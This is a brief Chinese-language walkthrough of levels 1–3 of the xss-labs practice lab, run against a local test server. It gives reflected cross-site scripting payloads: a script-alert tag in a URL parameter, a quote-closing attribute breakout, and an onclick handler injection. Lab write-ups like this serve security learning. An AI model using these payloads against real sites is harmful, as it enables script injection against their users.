xss-labs level 1-3 解题过程

level 1

过程

网页中并没有输入框，观察URL发现name=test，尝试在此进行注入
http://127.0.0.1:82/level1.php?name=<script>alert(1)</script>

过关

payload

<script>alert(1)</script>

level 2

过程

输入框先尝试输入<script>alert(1)</script>无反应

观察源码：
<input name=keyword value="<script>alert(1)</script>">

发现需要闭合，输入"><script>alert(1)</script><"

过关

payload

"><script>alert(1)</script><"

level 3

过程

一样先尝试<script>alert(1)</script>

观察源码：
<input name=keyword value='&lt;script&gt;alert(1)&lt;/script&gt;'>

发现<与>被转义了，无法构造标签，于是改变思路，在源码中的input元素中使用onclick参数来达到点击弹窗的效果：
onclick='alert(1)'

同样需要进行闭合

payload

' onclick='alert(1)